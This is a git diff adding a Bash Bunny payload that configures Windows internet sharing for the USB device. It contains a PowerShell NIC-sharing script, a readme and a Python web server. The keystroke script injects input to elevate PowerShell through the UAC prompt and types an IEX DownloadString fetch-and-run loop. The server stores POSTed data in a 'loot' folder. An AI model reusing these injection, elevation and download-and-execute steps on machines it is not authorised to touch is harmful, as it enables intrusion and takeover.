diff --git a/payloads/library/general/Windows NIC Sharing/p.ps1 b/payloads/library/general/Windows NIC Sharing/p.ps1 new file mode 100644 index 00000000..84f8a801 --- /dev/null +++ b/payloads/library/general/Windows NIC Sharing/p.ps1 @@ -0,0 +1,56 @@ +# Set up and configure NIC to share internets with BB +# Credit to wiki.bashbunny.com for the outline +# Credit to Wasabi Fan on technet for the Com-Object stuff + +Clear-Host +# Share Internet connection +Write-Output "Configuring Bash Bunny for internet usage..." +Write-Output "Getting WMI info on NICs..." +$BBWMIAdapter = (Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter 'MACAddress = "00:11:22:33:44:55"') +$WMIAdapters = (Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter 'MACAddress<>"00:11:22:33:44:55"') | %{ if ($_.IPAddress -ne $null) {$_}} +# Get Target GUID (shareable NIC) +# This is an imperfect method of getting the GUID, I'm just assuming that no one has +# more than 38 NICs on their Windows PC, and using it as an indicator of array dimensions +if ((($WMIAdapters.SettingID).Length -gt 1) -and (($WMIAdapters.SettingID).Length -lt 38)){ + $ETHGuid = $WMIAdapters[0].SettingID +} else { + $ETHGuid = $WMIAdapters.SettingID +} +regsvr32 /s hnetcfg.dll # Register HNetCfg library +$NetSharing = New-Object -ComObject HNetCfg.HNetShare # Create NetSharingManager object +function share ($GUID, $Public) { + $Connection = $NetSharing.EnumEveryConnection | ?{ $NetSharing.NetConnectionProps.Invoke($_).Guid -eq $GUID } # Find Connection + $CfgSharing = $NetSharing.INetSharingConfigurationForINetConnection.Invoke($Connection) # Get sharing config + if ($Public) { $pubvar = 0 } else { $pubvar = 1 } + $CfgSharing.EnableSharing($pubvar) # Enable sharing with public (public = 0, private = 1) +} +function unshare ($GUID) { + $Connection = $NetSharing.EnumEveryConnection | ?{ $NetSharing.NetConnectionProps.Invoke($_).Guid -eq $GUID } # Find Connection + $NetSharing.INetSharingConfigurationForINetConnection.Invoke($Connection).DisableSharing() # Disable Sharing +} +Write-Output "Setting up interface sharing..." +Write-Output "Setting up interface sharing on primary NIC...." +share -GUID $ETHGuid -Public $true # Set live NIC to share public +Write-Output "Setting up interface sharing on Bash Bunny...." +share -GUID $BBWMIAdapter.SettingID -Public $false # Set Bash Bunny NIC to share private + +Write-Output "Setting static IP for bash buny NIC..." +$BBWMIAdapter.EnableStatic('172.16.64.64','255.255.255.0') + +Clear-Host +# Sharing should be done +Write-Output "#########################################################" +Write-Output "The Bash Bunny should now be able to access the internet" +Write-Output "You should be able to ssh into your Bash Bunny at:" +Write-Output "172.16.64.1" +Write-Output "Hit ENTER to clean up network settings" +Write-Output "#########################################################" +Pause + +# Take down sharing +Write-Output "Disabling interface sharing on primary NIC...." +unshare -GUID $ETHGuid -Public $true # Stop public sharing on live NIC +Write-Output "Disabling interface sharing on Bash Bunny...." +unshare -GUID $BBWMIAdapter.SettingID # Stop private sharing on Bash Bunny NIC + +EXIT diff --git a/payloads/library/general/Windows NIC Sharing/payload.txt b/payloads/library/general/Windows NIC Sharing/payload.txt new file mode 100644 index 00000000..bf19038b --- /dev/null +++ b/payloads/library/general/Windows NIC Sharing/payload.txt @@ -0,0 +1,80 @@ +#!/bin/bash +############################################## +# Sharing Internet with Windows +# +# Auto-config sharing with Windows 10. +############################################## + +# Other things to do once you have booted the +# bash bunny as an ethernet enabled box +# +# Windows +# Start > Run > "ncpa.cpl" Enter +# (Open Network Connections) +#Q DELAY 100 +#RUN WIN ncpa.cpl +#Q DELAY 1000 +#Q ENTER + +# Identify Bash Bunny interface +# Should be named: +# "USB Ethernet/RNDIS Gadget" + +# Sharing is caring +# Right-Click Ineternet interface click on +# "Properties" and select "Sharing" tab +# +# From "Sharing" tab check +# "Allow other netwrk usrs 2 connect... thru dis connection" +# Select the Bash Bunny Gadget and hit "OK" +# Right-click on Gadget and select "Properties" +# +# Generously gift an IP +# Select TCP/IPv4 and click "Properties" +# Set the IPv4=172.16.64.64 and Subnet=24-bit +# Hit all the OKs + +# Or we could just have the Bash Bunny do all the work... +LED SETUP +SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION + +# HID Attack Starts +ATTACKMODE HID + +# UAC Bypass +LED STAGE2 +DELAY 500 +Q GUI r +Q DELAY 1000 +Q STRING powershell Start-Process powershell -Verb runAs +Q DELAY 1000 +Q ENTER +Q DELAY 1000 +Q ALT y +Q DELAY 500 +Q ALT o +Q DELAY 500 +Q LEFTARROW +Q DELAY 100 +Q ENTER +Q DELAY 1200 +Q ENTER +Q DELAY 800 + +LED SPECIAL2 +#Powershell Payload: first wait for connection to bunny webserver, then run network config +#Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\"" +Q STRING "Start-Sleep -Seconds 15 ; while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1')}}" +Q DELAY 300 +Q ENTER + +LED W +# Ethernet Attack Starts +ATTACKMODE RNDIS_ETHERNET +LED CLEANUP +Q DELAY 200 +LED B +python $SWITCHDIR/server.py + +Q DELAY 5000 +LED FINISH diff --git a/payloads/library/general/Windows NIC Sharing/readme.md b/payloads/library/general/Windows NIC Sharing/readme.md new file mode 100644 index 00000000..1bbc8fe1 --- /dev/null +++ b/payloads/library/general/Windows NIC Sharing/readme.md @@ -0,0 +1,32 @@ +# Bash Bunny NIC Sharing from Windows +* Author: hayze +* Version: Version 0.1 +* Target: Windows 10 + +## Description + +Sets up Networking for Bash Bunny. You should be able to SSH to the Bash Bunny +at 172.16.64.1 once networking has been configured. + +## Configuration + +None needed. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Magenta (solid) | Setting mode to HID | +| Yellow (blinking) | Running PowerShell as admin | +| Cyan (blinking) | Entering PowerShell IEX command | +| White (solid) | Setting mode to RNDIS_ETHERNET | +| White (blinking) | Running WebServer for IEX script | +| Blue (solid) | Running PowerShell script | +| Green | Windows should be configured to share | + +## Credits + +QDBA for the server py and readme layout +Hak5 for the Windows sharing instructions +Wasabi Fan on technet for the Com-Object stuff + diff --git a/payloads/library/general/Windows NIC Sharing/server.py b/payloads/library/general/Windows NIC Sharing/server.py new file mode 100644 index 00000000..74b623de --- /dev/null +++ b/payloads/library/general/Windows NIC Sharing/server.py @@ -0,0 +1,60 @@ +import os +from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer + + +IS_RUNNING = True +abspath = os.path.abspath(__file__) +CURR_DIR = os.path.dirname(abspath) +os.chdir(CURR_DIR) + +class RequestServer(BaseHTTPRequestHandler): + def _set_headers(self): + self.send_response(200, "ok") + self.send_header('Content-type', 'text/plain') + self.protocol_version = 'HTTP/1.1' + + def do_GET(self): + self.send_response(200, "ok") + self.send_header("Content-type", "text/plain") + self.end_headers() + try: + with open(CURR_DIR + self.path, 'r+') as f: + data = f.read() + self.wfile.write(data) + except IOError: + self.send_response(404) + self.wfile.write(CURR_DIR) + return + + def do_POST(self): + global IS_RUNNING + + self.send_response(200) + self.send_header("Content-type", "text/plain") + self.end_headers() + content_length = int(self.headers['Content-Length']) + filename = self.path[1:] + + if filename == 'EOF': + data = self.rfile.read(content_length) + with open(CURR_DIR + "/loot/{}".format(filename), "w+") as f: + f.write(data) + f.close() + self.end_headers() + IS_RUNNING = False + else: + data = self.rfile.read(content_length) + with open(CURR_DIR + "/loot/{}.txt".format(filename), "w+") as f: + f.write(data) + f.close() + self._set_headers() + +def run(server_class=HTTPServer, handler_class=RequestServer, port=80): + server_address = ('', port) + httpd = server_class(server_address, handler_class) + + while IS_RUNNING: + httpd.handle_request() + +if __name__ == '__main__': + run() \ No newline at end of file